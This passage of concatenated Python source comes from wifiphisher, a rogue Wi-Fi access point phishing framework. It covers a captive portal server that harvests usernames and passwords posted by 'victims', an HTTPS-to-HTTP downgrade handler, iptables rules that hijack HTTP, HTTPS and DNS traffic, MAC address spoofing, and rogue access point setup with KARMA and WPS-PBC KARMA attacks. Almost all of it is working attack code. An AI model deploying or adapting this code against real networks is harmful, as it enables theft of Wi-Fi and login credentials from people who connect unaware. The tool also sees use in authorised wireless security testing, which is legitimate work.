have passed... if (time.time() - self._starttime > constants.KB_INTERVAL): # Do a list shift self._full_pkt_list = self._full_pkt_list[constants.KB_BUCKET_SIZE:] + \ self._full_pkt_list[:constants.KB_BUCKET_SIZE] self._starttime = time.time() first_essid = self._full_pkt_list[0][dot11.Dot11Elt].info.decode("utf8") last_essid = self._full_pkt_list[constants.KB_BUCKET_SIZE-1][dot11.Dot11Elt].info.decode("utf8") self._msg.append("Sending %s known beacons (%s ... 
%s)" % \ (str(constants.KB_BUCKET_SIZE), first_essid, \ last_essid)) self._packets_to_send["*"] = self._full_pkt_list[:constants.KB_BUCKET_SIZE] return self._packets_to_send def send_output(self): """ Sending Knownbeacons notification :param self: A Knownbeacons object :type self: Knownbeacons :return: list of notification messages :rtype: list .. note: Only sends notification for the first time to reduce clutters """ if self._msg: return self._msg return ["Sending known beacons..."] def send_channels(self): """ Send all interested channels :param self: A Knownbeacons object :type self: Knownbeacons :return: A list with all the channels interested :rtype: list .. note: Only the channel of the target AP is sent here """ return [self.data.target_ap_channel] def on_exit(self): """ :param self: A Knownbeacons object :type self: Knownbeacons Free all the resources regarding to this module :return: None :rtype: None """ pass File: wifiphisher/common/phishinghttp.py import datetime import json import logging import os.path import re import time import asyncio import tornado.ioloop import tornado.web import tornado.platform.asyncio import wifiphisher.common.constants as constants import wifiphisher.common.extensions as extensions import wifiphisher.common.uimethods as uimethods import wifiphisher.common.victim as victim from tornado.escape import json_decode asyncio.set_event_loop_policy(tornado.platform.asyncio.AnyThreadEventLoopPolicy()) hn = logging.NullHandler() hn.setLevel(logging.DEBUG) logging.getLogger('tornado.access').disabled = True logging.getLogger('tornado.general').disabled = True template = False terminate = False creds = [] logger = logging.getLogger(__name__) credential_log_path = None class DowngradeToHTTP(tornado.web.RequestHandler): def get(self): port = self.application.settings.get('port') self.redirect("http://10.0.0.1:{}/".format(port)) class BackendHandler(tornado.web.RequestHandler): """ Validate the POST requests from client by the uimethods """ def initialize(self, em): """ :param self: A tornado.web.RequestHandler object :param em: An extension manager object :type self: tornado.web.RequestHandler :type em: ExtensionManager :return: None :rtype: None """ self.em = em def post(self): """ :param self: A tornado.web.RequestHandler object :type self: tornado.web.RequestHandler :return: None :rtype: None ..note: override the post method to do the verification """ json_obj = json_decode(self.request.body) response_to_send = {} backend_methods = self.em.get_backend_funcs() # loop all the required verification methods for func_name in list(json_obj.keys()): if func_name in backend_methods: # get the corresponding callback callback = getattr(backend_methods[func_name], func_name) # fire the corresponding varification method response_to_send[func_name] = callback(json_obj[func_name]) else: response_to_send[func_name] = "NotFound" self.write(json.dumps(response_to_send)) class CaptivePortalHandler(tornado.web.RequestHandler): def get(self): """ Override the get method :param self: A tornado.web.RequestHandler object :type self: tornado.web.RequestHandler :return: None :rtype: None """ requested_file = self.request.path[1:] template_directory = template.get_path() # choose the correct file to serve if os.path.isfile(template_directory + requested_file): render_file = requested_file else: render_file = "index.html" # load the file file_path = template_directory + render_file self.render(file_path, **template.get_context()) log_file_path = "/tmp/wifiphisher-webserver.tmp" with 
open(log_file_path, "a+") as log_file: log_file.write("GET request from {0} for {1}\n".format( self.request.remote_ip, self.request.full_url())) # record the GET request in the logging file logger.info("GET request from %s for %s", self.request.remote_ip, self.request.full_url()) # Find the victim object that corresponds to the ip address # And try to Discover OS by requestt victims_instance = victim.Victims.get_instance() victims_instance.associate_victim_ip_to_os( self.request.remote_ip, self.request.full_url()) def post(self): """ Override the post method :param self: A tornado.web.RequestHandler object :type self: tornado.web.RequestHandler :return: None :rtype: None ..note: we only serve the Content-Type which starts with "application/x-www-form-urlencoded" as a valid post request """ global terminate # check the http POST request header contains the Content-Type try: content_type = self.request.headers["Content-Type"] except KeyError: return try: # Check if this is a valid POST request if content_type.startswith(constants.VALID_POST_CONTENT_TYPE): post_data = tornado.escape.url_unescape(self.request.body) # log the data log_file_path = "/tmp/wifiphisher-webserver.tmp" with open(log_file_path, "a+") as log_file: log_file.write("POST request from {0} with {1}\n".format( self.request.remote_ip, post_data)) # record the post requests in the logging file logger.info("POST request from %s with %s", self.request.remote_ip, post_data) if re.search(constants.REGEX_PWD, post_data, re.IGNORECASE) or \ re.search(constants.REGEX_UNAME, post_data, re.IGNORECASE): if credential_log_path: with open(credential_log_path, 'a+') as credential_log: credential_log.write("{} {}".format( time.strftime(constants.CREDENTIALS_DATETIME_FORMAT), "POST request from {0} with {1}\n".format( self.request.remote_ip, post_data))) creds.append(post_data) terminate = True # Invalid UTF-8, drop it. 
except UnicodeDecodeError: pass requested_file = self.request.path[1:] template_directory = template.get_path() # choose the correct file to serve if os.path.isfile(template_directory + requested_file): render_file = requested_file else: render_file = "index.html" # load the file file_path = template_directory + render_file self.render(file_path, **template.get_context()) # Find the victim object that corresponds to the ip address # And try to Discover OS by request victims_instance = victim.Victims.get_instance() victims_instance.associate_victim_ip_to_os( self.request.remote_ip, self.request.full_url()) def runHTTPServer(ip, port, ssl_port, t, em): global template template = t # Get all the UI funcs and set them to uimethods module for f in em.get_ui_funcs(): setattr(uimethods, f.__name__, f) app = tornado.web.Application( [ (r"/backend/.*", BackendHandler, { "em": em }), (r"/.*", CaptivePortalHandler), ], template_path=template.get_path(), static_path=template.get_path_static(), compiled_template_cache=False, ui_methods=uimethods) app.listen(port, address=ip) ssl_app = tornado.web.Application([(r"/.*", DowngradeToHTTP)], port=port) https_server = tornado.httpserver.HTTPServer( ssl_app, ssl_options={ "certfile": constants.PEM, "keyfile": constants.PEM, }) https_server.listen(ssl_port, address=ip) tornado.ioloop.IOLoop.instance().start() File: wifiphisher/common/interfaces.py # -*- coding: utf-8 -*- """ This module was made to handle all the interface related operations of the program """ import logging import random from collections import defaultdict from subprocess import PIPE, Popen, check_output import pyric import pyric.pyw as pyw import wifiphisher.common.constants as constants logger = logging.getLogger("wifiphisher.interfaces") class InvalidInterfaceError(Exception): """ Exception class to raise in case of a invalid interface """ def __init__(self, interface_name, mode=None): """ Construct the class :param self: A InvalidInterfaceError object :param interface_name: Name of an interface :type self: InvalidInterfaceError :type interface_name: str :return: None :rtype: None """ message = "The provided interface \"{0}\" is invalid!".format( interface_name) # provide more information if mode is given if mode: message += "Interface {0} doesn't support {1} mode".format( interface_name, mode) Exception.__init__(self, message) class InvalidMacAddressError(Exception): """ Exception class to raise in case of specifying invalid mac address """ def __init__(self, mac_address): """ Construct the class :param self: A InvalidMacAddressError object :param mac_address: A MAC address :type self: InvalidMacAddressError :type mac_address: str :return: None :rtype: None """ message = "The MAC address could not be set. 
(Tried {0})".format(mac_address) Exception.__init__(self, message) class InvalidValueError(Exception): """ Exception class to raise in case of a invalid value is supplied """ def __init__(self, value, correct_value_type): """ Construct the class :param self: A InvalidValueError object :param value_type: The value supplied :param correct_value_type: The correct value type :type self: InvalidValueError :type value_type: any :type correct_value_type: any :return: None :rtype: None """ value_type = type(value) message = ("Expected value type to be {0} while got {1}.".format( correct_value_type, value_type)) Exception.__init__(self, message) class InterfaceCantBeFoundError(Exception): """ Exception class to raise in case of a invalid value is supplied """ def __init__(self, interface_modes): """ Construct the class :param self: A InterfaceCantBeFoundError object :param interface_modes: Modes of interface required :type self: InterfaceCantBeFoundError :type interface_modes: tuple :return: None :rtype: None .. note: For interface_modes the tuple should contain monitor mode as first argument followed by AP mode """ monitor_mode = interface_modes[0] ap_mode = interface_modes[1] message = "Failed to find an interface with " # add appropriate mode if monitor_mode: message += "monitor" elif ap_mode: message += "AP" message += " mode" Exception.__init__(self, message) class InterfaceManagedByNetworkManagerError(Exception): """ Exception class to raise in case of NetworkManager controls the AP or deauth interface """ def __init__(self, interface_name): """ Construct the class. :param self: An InterfaceManagedByNetworkManagerError object :param interface_name: Name of interface :type self: InterfaceManagedByNetworkManagerError :type interface_name: str :return: None :rtype: None """ message = ( "Interface \"{0}\" is controlled by NetworkManager." "You need to manually set the devices that should be ignored by NetworkManager " "using the keyfile plugin (unmanaged-directive). 
For example, '[keyfile] " "unmanaged-devices=interface-name:\"{0}\"' needs to be added in your " "NetworkManager configuration file.".format(interface_name)) Exception.__init__(self, message) class NetworkAdapter(object): """ This class represents a network interface """ def __init__(self, name, card_obj, mac_address): """ Setup the class with all the given arguments :param self: A NetworkAdapter object :param name: Name of the interface :param card_obj: A pyric.pyw.Card object :param mac_address: The MAC address of interface :type self: NetworkAdapter :type name: str :type card_obj: pyric.pyw.Card :type mac_address: str :return: None :rtype: None """ # Setup the fields self._name = name self._has_ap_mode = False self._has_monitor_mode = False self._is_managed_by_nm = False self._card = card_obj self._original_mac_address = mac_address self._current_mac_address = mac_address @property def name(self): """ Return the name of the interface :param self: A NetworkAdapter object :type self: NetworkAdapter :return: The name of the interface :rtype: str """ return self._name @property def is_managed_by_nm(self): """ Return whether the interface controlled by NetworkManager :param self: A NetworkAdapter object :type self: NetworkAdapter :return: True if interface is controlled by NetworkManager :rtype: bool """ return self._is_managed_by_nm @is_managed_by_nm.setter def is_managed_by_nm(self, value): """ Set whether the interface is controlled by NetworkManager :param self: A NetworkAdapter object :param value: A value representing interface controlled by NetworkManager :type self: NetworkAdapter :type value: bool :return: None :rtype: None :raises InvalidValueError: When the given value is not bool """ if isinstance(value, bool): self._is_managed_by_nm = value else: raise InvalidValueError(value, bool) @property def has_ap_mode(self): """ Return whether the interface supports AP mode :param self: A NetworkAdapter object :type self: NetworkAdapter :return: True if interface supports AP mode and False otherwise :rtype: bool """ return self._has_ap_mode @has_ap_mode.setter def has_ap_mode(self, value): """ Set whether the interface supports AP mode :param self: A NetworkAdapter object :param value: A value representing AP mode support :type self: NetworkAdapter :type value: bool :return: None :rtype: None :raises InvalidValueError: When the given value is not bool """ if isinstance(value, bool): self._has_ap_mode = value else: raise InvalidValueError(value, bool) @property def has_monitor_mode(self): """ Return whether the interface supports monitor mode :param self: A NetworkAdapter object :type self: NetworkAdapter :return: True if interface supports monitor mode and False otherwise :rtype: bool """ return self._has_monitor_mode @has_monitor_mode.setter def has_monitor_mode(self, value): """ Set whether the interface supports monitor mode :param self: A NetworkAdapter object :param value: A value representing monitor mode support :type self: NetworkAdapter :type value: bool :return: None :rtype: None :raises InvalidValueError: When the given value is not bool """ if isinstance(value, bool): self._has_monitor_mode = value else: raise InvalidValueError(value, bool) @property def card(self): """ Return the card object associated with the interface :param self: A NetworkAdapter object :type self: NetworkAdapter :return: The card object :rtype: pyric.pyw.Card """ return self._card @property def mac_address(self): """ Return the current MAC address of the interface :param self: A NetworkAdapter object 
:type self: NetworkAdapter :return: The MAC of the interface :rtype: str """ return self._current_mac_address @mac_address.setter def mac_address(self, value): """ Set the MAC address of the interface :param self: A NetworkAdapter object :param value: A value representing monitor mode support :type self: NetworkAdapter :type value: str :return: None :rtype: None """ self._current_mac_address = value @property def original_mac_address(self): """ Return the original MAC address of the interface :param self: A NetworkAdapter object :type self: NetworkAdapter :return: The original MAC of the interface :rtype: str """ return self._original_mac_address class NetworkManager(object): """ This class represents a network manager where it handles all the management for the interfaces. """ def __init__(self): """ Setup the class with all the given arguments. :param self: A NetworkManager object :type self: NetworkManager :return: None :rtype: None """ self._name_to_object = dict() self._active = set() self._exclude_shutdown = set() self._internet_access_enable = False self._vifs_add = set() @property def internet_access_enable(self): """ Return whether an interface will be used to provide Internet access :param self: A NetworkManager object :type self: NetworkManager :return: None :rtype: None """ return self._internet_access_enable @internet_access_enable.setter def internet_access_enable(self, value): """ Set the internet access :param self: A NetworkManager object :type self: NetworkManager :return: None :rtype: None """ if isinstance(value, bool): self._internet_access_enable = value else: raise InvalidValueError(value, bool) def nm_unmanage(self, interface): """ Set an interface to unmanaged. :param interface: Name of the interface :type interface: str :return: True upon success :rtype: bool """ try: proc = Popen(['nmcli', 'dev', 'set', interface, 'manage', 'no'], stderr=PIPE) err = proc.communicate()[1] except: logger.error("Failed to make NetworkManager unmanage interface {0}: {1}".format(interface, err)) raise InterfaceManagedByNetworkManagerError(interface) # Ensure that the interface is unmanaged if is_managed_by_network_manager(interface): raise InterfaceManagedByNetworkManagerError(interface) def is_interface_valid(self, interface_name, mode=None): """ Check if interface is valid :param self: A NetworkManager object :param interface_name: Name of an interface :param mode: The mode of the interface to be checked :type self: NetworkManager :type interface_name: str :type mode: str :return: True if interface is valid :rtype: bool :raises InvalidInterfaceError: If the interface is invalid or the interface has been chosen in the set _active :raises InterfaceManagedByNetworkManagerError: If the card is managed and is being used as deauth/ap mode .. note: The available modes are monitor, AP, WPS and internet The internet adapter should be put in the _exclude_shutdown set so that it will not be shutdown after the program exits. 
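A minimal usage sketch (interface names are hypothetical)::

    nm = NetworkManager()
    nm.start(args)
    # Returns True on success; raises InvalidInterfaceError or
    # InterfaceManagedByNetworkManagerError otherwise.
    if nm.is_interface_valid("wlan0", "AP"):
        ap_iface = "wlan0"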
""" try: interface_adapter = self._name_to_object[interface_name] except KeyError: # if mode is internet and not wireless card bypass the check if mode == "internet": return True else: raise InvalidInterfaceError(interface_name) # add to _exclude_shutdown set if the card is internet adapter if mode == "internet" or mode == "WPS": self._exclude_shutdown.add(interface_name) # raise an error if interface doesn't support the mode if mode != "internet" and interface_adapter.is_managed_by_nm\ and self.internet_access_enable: self.nm_unmanage(interface_name) if mode == "monitor" and not interface_adapter.has_monitor_mode: raise InvalidInterfaceError(interface_name, mode) elif mode == "AP" and not interface_adapter.has_ap_mode: raise InvalidInterfaceError(interface_name, mode) # raise an error if interface is already in the _active set if interface_name in self._active: raise InvalidInterfaceError(interface_name) self._active.add(interface_name) return True def up_interface(self, interface_name): """ Equivalent to ifconfig interface_name up :param self: A NetworkManager object :param interface_name: Name of an interface :type self: NetworkManager :type interface_name: str :return: None :rtype: None ..note: Let the pywifiphisher decide when to up the interface since some cards cannot up two virtual interface with managed mode in the same time. """ card = self._name_to_object[interface_name].card pyw.up(card) def down_interface(self, interface_name): """ Equivalent to ifconfig interface_name down :param self: A NetworkManager object :param interface_name: Name of an interface :type self: NetworkManager :type interface_name: str :return: None :rtype: None """ card = self._name_to_object[interface_name].card pyw.down(card) def set_interface_mac(self, interface_name, mac_address=None): """ Set the specified MAC address for the interface :param self: A NetworkManager object :param interface_name: Name of an interface :param mac_address: A MAC address :type self: NetworkManager :type interface_name: str :type mac_address: str :return: new MAC :rtype: str .. note: This method will set the interface to managed mode """ if not mac_address: mac_address = generate_random_address() self._name_to_object[interface_name].mac_address = mac_address card = self._name_to_object[interface_name].card self.set_interface_mode(interface_name, "managed") self.down_interface(interface_name) # card must be turned off(down) before setting mac address try: pyw.macset(card, mac_address) # make sure to catch an invalid mac address except pyric.error as error: raise InvalidMacAddressError(mac_address) return mac_address def get_interface_mac(self, interface_name): """ Return the MAC address of the interface :param self: A NetworkManager object :param interface_name: Name of an interface :type self: NetworkManager :type interface_name: str :return: Interface MAC address :rtype: str """ return self._name_to_object[interface_name].mac_address def set_interface_mode(self, interface_name, mode): """ Set the specified mode for the interface :param self: A NetworkManager object :param interface_name: Name of an interface :param mode: Mode of an interface :type self: NetworkManager :type interface_name: str :type mode: str :return: None :rtype: None .. 
note: Available modes are unspecified, ibss, managed, AP AP VLAN, wds, monitor, mesh, p2p Only set the mode when card is in the down state """ card = self._name_to_object[interface_name].card self.down_interface(interface_name) # set interface mode between brining it down and up pyw.modeset(card, mode) def get_interface(self, has_ap_mode=False, has_monitor_mode=False): """ Return the name of a valid interface with modes supplied :param self: A NetworkManager object :param has_ap_mode: AP mode support :param has_monitor_mode: Monitor mode support :type self: NetworkManager :type has_ap_mode: bool :type has_monitor_mode: bool :return: Name of valid interface :rtype: str .. raises InterfaceCantBeFoundError: When an interface with supplied modes can't be found .. raises InterfaceManagedByNetworkManagerError: When the chosen interface is managed by NetworkManager .. note: This method guarantees that an interface with perfect match will be returned if available """ possible_adapters = list() for interface, adapter in list(self._name_to_object.items()): # check to make sure interface is not active and not already in the possible list if (interface not in self._active) and ( adapter not in possible_adapters): # in case of perfect match case if (adapter.has_ap_mode == has_ap_mode and adapter.has_monitor_mode == has_monitor_mode): possible_adapters.insert(0, adapter) # in case of requested AP mode and interface has AP mode (Partial match) elif has_ap_mode and adapter.has_ap_mode: possible_adapters.append(adapter) # in case of requested monitor mode and interface has monitor mode (Partial match) elif has_monitor_mode and adapter.has_monitor_mode: possible_adapters.append(adapter) # From all possible interface candidates, # give priority to those we may have created our_vifs = [] for wlan in self._vifs_add: for adapter in possible_adapters: if wlan.dev == adapter.name: our_vifs.append(adapter) for adapter in our_vifs + possible_adapters: if ((not adapter.is_managed_by_nm and self.internet_access_enable) or (not self.internet_access_enable)): chosen_interface = adapter.name self._active.add(chosen_interface) return chosen_interface if possible_adapters: raise InterfaceManagedByNetworkManagerError("ALL") else: raise InterfaceCantBeFoundError((has_monitor_mode, has_ap_mode)) def get_interface_automatically(self): """ Returns a tuple of two interfaces :param self: A NetworkManager object :param self: NetworkManager :return: Name of monitor interface followed by AP interface :rtype: tuple """ monitor_interface = self.get_interface(has_monitor_mode=True) ap_interface = self.get_interface(has_ap_mode=True) return (monitor_interface, ap_interface) def unblock_interface(self, interface_name): """ Unblock interface if it is blocked :param self: A NetworkManager object :param interface_name: Name of an interface :type self: NetworkManager :type interface_name: str :return: None :rtype: None """ card = self._name_to_object[interface_name].card # unblock card if it is blocked try: if pyw.isblocked(card): pyw.unblock(card) except pyric.error: pass def set_interface_channel(self, interface_name, channel): """ Set the channel for the interface :param self: A NetworkManager object :param interface_name: Name of an interface :param channel: A channel number :type self: NetworkManager :type interface_name: str :type channel: int :return: None :rtype: None """ card = self._name_to_object[interface_name].card pyw.chset(card, channel) def add_virtual_interface(self, card): """ Add the virtual interface to the host system 
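Illustrative use (the interface name is an example; the card object would
normally come from pyw.getcard)::

    card = pyw.getcard("wlan0")
    mon_name = network_manager.add_virtual_interface(card)
    # mon_name is e.g. "wfphshr-wlan0", a new monitor-mode virtual
    # interface tracked in _vifs_add so it can be removed on exit.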
:param self: A NetworkManager object :param card: A pyw.Card object :type self: NetworkManager :type card: pyw.Card :return name of the interface :rtype str :..note: when add the interface it is possible raising the pyric.error causing by adding the duplicated wlan interface name. """ done_flag = True number = -1 while done_flag: try: number += 1 name = 'wfphshr-wlan' + str(number) pyw.down(card) monitor_card = pyw.devadd(card, name, 'monitor') done_flag = False # catch if wlan1 is already exist except pyric.error: pass self._vifs_add.add(monitor_card) return name def remove_vifs_added(self): """ Remove all the added virtual interfaces :param self: A NetworkManager object :type self: NetworkManager :return: None :rtype: None """ for card in self._vifs_add: pyw.devdel(card) def start(self, args): """ Start the network manager :param self: A NetworkManager object :type self: NetworkManager :param args: An argparse.Namespace object :type args: argparse.Namespace :return: None :rtype: None """ # populate our dictionary with all the available interfaces on the system for interface in pyw.interfaces(): try: card = pyw.getcard(interface) mac_address = pyw.macget(card) adapter = NetworkAdapter(interface, card, mac_address) self._name_to_object[interface] = adapter interface_property_detector(adapter) # ignore devices that are not supported(93) and no such device(19) except pyric.error as error: if error.args[0] in (93, 19): pass elif interface == args.internetinterface: return False else: raise error def on_exit(self): """ Perform a clean up for the class :param self: A NetworkManager object :type self: NetworkManager :return: None :rtype: None ..note: The cards in _exclude_shutdown will not set to the original mac address since these cards are not changed the mac addresses by the program. 
""" for interface in self._active: if interface not in self._exclude_shutdown: adapter = self._name_to_object[interface] mac_address = adapter.original_mac_address self.set_interface_mac(interface, mac_address) # remove all the virtual added virtual interfaces self.remove_vifs_added() def is_add_vif_required(main_interface, internet_interface, wpspbc_assoc_interface): """ Return the card if only that card support both monitor and ap :param args: Arguemnt from pywifiphisher :type args: parse.args :return: tuple of card and is_frequency_hop_allowed :rtype: tuple """ def get_perfect_card(phy_map_vifs, vif_score_tups): """ Get the perfect card that both supports ap and monitor when we have only one phy interface can do that :param phy_map_vifs: phy number maps to the virtual interfaces :param vif_score_tups: list of tuple containing card and score :type phy_map_vifs: dict :type vif_score_tups: list :return tuple of card and single_perfect_phy_case :rtype: tuple """ # case 1 : one phy maps to one virtual interface if len(phy_map_vifs) == 1 and len(list(phy_map_vifs.values())[0]) == 1: # only take the first tuple vif_score_tuple = vif_score_tups[0] card = vif_score_tuple[0] score = vif_score_tuple[1] # if this card support both monitor and AP mode if score == 2: return card, True # case 2 : one phy maps to multiple virtual interfaces # we don't need to create one more virtual interface in this case elif len(phy_map_vifs) == 1 and len(list(phy_map_vifs.values())[0]) > 1: return None, True # case 3 : we have multiple phy interfaces but only # one card support both monitor and AP and the other # ones just support the managed mode only elif len(phy_map_vifs) > 1: if vif_score_tups[0][1] == 2 and vif_score_tups[1][1] == 0: return vif_score_tups[0][0], True return None, False # map the phy interface to virtual interfaces # i.e. phy0 to wlan0 phy_to_vifs = defaultdict(list) # map the phy# to the virtual interface tuples for vif in [vif for vif in pyw.interfaces() if pyw.iswireless(vif)]: # excluding the card that used for internet accessing # setup basic card information score = 0 if vif == internet_interface or vif == wpspbc_assoc_interface: continue else: card = pyw.getcard(vif) phy_number = card.phy supported_modes = pyw.devmodes(card) if "monitor" in supported_modes: score += 1 if "AP" in supported_modes: score += 1 phy_to_vifs[phy_number].append((card, score)) # each phy number map to a sublist containing (card, score) vif_score_tuples = [sublist[0] for sublist in list(phy_to_vifs.values())] # sort with score vif_score_tuples = sorted(vif_score_tuples, key=lambda tup: -tup[1]) use_one_phy = False # check the user-provided args.interface if main_interface: card = pyw.getcard(main_interface) phy_number = card.phy if phy_to_vifs[card.phy][0][1] == 2: perfect_card = card use_one_phy = True else: raise InvalidInterfaceError(main_interface) else: perfect_card, use_one_phy = get_perfect_card( phy_to_vifs, vif_score_tuples) return perfect_card, use_one_phy def is_managed_by_network_manager(interface_name): """ Check if the interface is managed by NetworkManager At this point NetworkManager may or may not be running. If it's not running, nothing is returned. 
:param interface_name: An interface name :type interface_name: str :return if managed by NetworkManager return True :rtype: bool """ is_managed = False try: nmcli_process = Popen(['/bin/sh', '-c', 'export LC_ALL=C; nmcli dev; unset LC_ALL'], stdout=constants.DN, stderr=PIPE) out, err = nmcli_process.communicate() if err == None and out != "": for l in out.splitlines(): #TODO: If the device is managed and user has nmcli installed, # we can probably do a "nmcli dev set wlan0 managed no" if interface_name in l: if "unmanaged" not in l: is_managed = True else: # Ignore until we make handle logging registers properly. pass #logger.error("Failed to make NetworkManager ignore interface %s", interface_name) else: # Ignore until we make handle logging registers properly. pass #logger.error("Failed to check if interface %s is managed by NetworkManager", interface_name) nmcli_process.stdout.close(); # NetworkManager service is not running so the devices must be unmanaged # (CalledProcessError) # Or nmcli is not installed... except: pass return bool(is_managed) def interface_property_detector(network_adapter): """ Add appropriate properties of the interface such as supported modes and wireless type(wireless) :param network_adapter: A NetworkAdapter object :type interface_name: NetworkAdapter :return: None :rtype: None """ supported_modes = pyw.devmodes(network_adapter.card) # check for monitor, AP and wireless mode support if "monitor" in supported_modes: network_adapter.has_monitor_mode = True if "AP" in supported_modes: network_adapter.has_ap_mode = True interface_name = network_adapter.name network_adapter.is_managed_by_nm = is_managed_by_network_manager( interface_name) def is_wireless_interface(interface_name): """ Check if the interface is wireless interface :param interface_name: Name of an interface :type interface_name: str :return: True if the interface is wireless interface :rtype: bool """ if pyw.iswireless(interface_name): return True return False def generate_random_address(): """ Make and return the randomized MAC address :return: A MAC address :rtype str .. 
warning: The first 3 octets are 00:00:00 by default """ mac_address = constants.DEFAULT_OUI + ":{:02x}:{:02x}:{:02x}".format( random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)) return mac_address def does_have_mode(interface, mode): """ Return whether the provided interface has the mode :param interface: Name of the interface :param mode: Mode of operation :type interface: str :type mode: str :return: True if interface has the mode and False otherwise :rtype: bool :Example: >>> does_have_mode("wlan0", "AP") True >>> does_have_mode("wlan1", "monitor") False """ card = pyric.pyw.getcard(interface) return mode in pyric.pyw.devmodes(card) File: wifiphisher/common/firewall.py """Serves as an abstraction layer in front of iptables.""" from __future__ import (absolute_import, division, print_function, unicode_literals) from wifiphisher.common.constants import NETWORK_GW_IP, PORT, SSL_PORT from wifiphisher.common.utilities import execute_commands class Fw(): """Handles all iptables operations.""" @staticmethod def nat(internal_interface, external_interface): # type: (str, str) -> None """Do NAT.""" execute_commands([ "iptables -t nat -A POSTROUTING -o {} -j MASQUERADE".format( external_interface), "iptables -A FORWARD -i {} -o {} -j ACCEPT".format( internal_interface, external_interface) ]) @staticmethod def clear_rules(): # type: () -> None """Clear all rules.""" execute_commands([ "iptables -F", "iptables -X", "iptables -t nat -F", "iptables -t nat -X" ]) @staticmethod def redirect_requests_localhost(): # type: () -> None """Redirect HTTP, HTTPS & DNS requests to localhost. Redirect the following requests to localhost: * HTTP (Port 80) * HTTPS (Port 443) * DNS (Port 53) """ execute_commands([ "iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT " "--to-destination {}:{}".format(NETWORK_GW_IP, PORT), "iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT " "--to-destination {}:{}".format(NETWORK_GW_IP, 53), "iptables -t nat -A PREROUTING -p tcp --dport 53 -j DNAT " "--to-destination {}:{}".format(NETWORK_GW_IP, 53), "iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT " "--to-destination {}:{}".format(NETWORK_GW_IP, SSL_PORT) ]) def on_exit(self): # type: () -> None """Start the clean up.""" self.clear_rules() File: wifiphisher/common/accesspoint.py """This module was made to fork the rogue access point.""" from __future__ import (absolute_import, division, print_function, unicode_literals) import os import subprocess import time from subprocess import check_output import roguehostapd.apctrl as apctrl import roguehostapd.config.hostapdconfig as hostapdconfig import wifiphisher.common.constants as constants import wifiphisher.common.victim as victim class AccessPoint(object): """This class forks the softAP.""" # Instance will be stored here. 
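    # AccessPoint is a singleton: get_instance() returns the existing
    # object or creates a new one on first use, and __init__ raises if it
    # is called a second time.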
__instance = None @staticmethod def get_instance(): """Return the instance of the class or create new if none exists.""" if AccessPoint.__instance is None: AccessPoint() return AccessPoint.__instance def __init__(self): # type: () -> None """Initialize the class.""" if AccessPoint.__instance: raise Exception("Error: AccessPoint class is a singleton!") else: AccessPoint.__instance = self self.interface = "" self.internet_interface = "" self.channel = "" self.essid = "" self.presharedkey = "" self.force_hostapd = False # roguehostapd object self.hostapd_object = None self.deny_mac_addrs = [] self.dns_conf_path = constants.DNS_CONF_PATH def start_dhcp_dns(self): # type: () -> None """Start the dhcp server.""" config = ('no-resolv\n' 'interface=%s\n' 'dhcp-range=%s\n') with open(self.dns_conf_path, 'w') as dhcpconf: dhcpconf.write(config % (self.interface, constants.DHCP_LEASE)) with open(self.dns_conf_path, 'a+') as dhcpconf: if self.internet_interface: dhcpconf.write("server=%s" % (constants.PUBLIC_DNS, )) else: dhcpconf.write("address=/google.com/172.217.5.78\n") dhcpconf.write("address=/clients3.google.com/172.217.11.174\n") dhcpconf.write("address=/#/%s " % (constants.NETWORK_GW_IP, )) # catch the exception if dnsmasq is not installed try: subprocess.Popen( ['dnsmasq', '-C', self.dns_conf_path], stdout=subprocess.PIPE, stderr=constants.DN) except OSError: print("[{}!{}] dnsmasq is not installed!".format( constants.R, constants.W)) raise Exception subprocess.Popen( ['ifconfig', str(self.interface), 'mtu', '1400'], stdout=constants.DN, stderr=constants.DN) subprocess.Popen( [ 'ifconfig', str(self.interface), 'up', constants.NETWORK_GW_IP, 'netmask', constants.NETWORK_MASK ], stdout=constants.DN, stderr=constants.DN) # Give it some time to avoid "SIOCADDRT: Network is unreachable" time.sleep(1) # Make sure that we have set the network properly. proc = subprocess.check_output(['ifconfig', str(self.interface)]) if constants.NETWORK_GW_IP not in proc.decode('utf-8'): return False subprocess.call(('route add -net %s netmask %s gw %s' % (constants.NETWORK_IP, constants.NETWORK_MASK, constants.NETWORK_GW_IP)), shell=True) def start(self, disable_karma=False): """Start the softAP.""" # create the configuration for roguehostapd hostapd_config = { "ssid": self.essid, "interface": self.interface, "channel": self.channel, "deny_macs": self.deny_mac_addrs, } if self.presharedkey: hostapd_config['wpa2password'] = self.presharedkey self.hostapd_object = apctrl.Hostapd() if not self.force_hostapd: try: # Enable KARMA attack if needed if not disable_karma: hostapd_config["karma_enable"] = 1 # Enable WPSPBC KARMA attack hostapd_config["wpspbc"] = True hostapd_options = { 'mute': True, 'timestamp': False, "eloop_term_disable": True } self.hostapd_object.start(hostapd_config, hostapd_options) except KeyboardInterrupt: raise Exception except BaseException: print( "[{}!{}] Roguehostapd is not installed in the system! Please install" " roguehostapd manually (https://github.com/wifiphisher/roguehostapd)" " and rerun the script. 
Otherwise, you can run the tool with the" " --force-hostapd option to use hostapd but please note that using" " Wifiphisher with hostapd instead of roguehostapd will turn off many" " significant features of the tool.".format( constants.R, constants.W)) # just raise exception when hostapd is not installed raise Exception else: # use the hostapd on the users' system self.hostapd_object.create_hostapd_conf_file(hostapd_config, {}) try: self.hostapd_object = subprocess.Popen( ['hostapd', hostapdconfig.ROGUEHOSTAPD_RUNTIME_CONFIGPATH], stdout=constants.DN, stderr=constants.DN) except OSError: print( "[{}!{}] hostapd is not installed in the system! Please download it" " using your favorite package manager (e.g. apt-get install hostapd) and " "rerun the script.".format(constants.R, constants.W)) # just raise exception when hostapd is not installed raise Exception time.sleep(2) if self.hostapd_object.poll() is not None: print("[{}!{}] hostapd failed to lunch!".format( constants.R, constants.W)) raise Exception def on_exit(self): # type: () -> None """Clean up the resoures when exits.""" subprocess.call('pkill dnsmasq', shell=True) try: self.hostapd_object.stop() except BaseException: subprocess.call('pkill hostapd', shell=True) if os.path.isfile(hostapdconfig.ROGUEHOSTAPD_RUNTIME_CONFIGPATH): os.remove(hostapdconfig.ROGUEHOSTAPD_RUNTIME_CONFIGPATH) if os.path.isfile(hostapdconfig.ROGUEHOSTAPD_DENY_MACS_CONFIGPATH): os.remove(hostapdconfig.ROGUEHOSTAPD_DENY_MACS_CONFIGPATH) if os.path.isfile('/var/lib/misc/dnsmasq.leases'): os.remove('/var/lib/misc/dnsmasq.leases') if 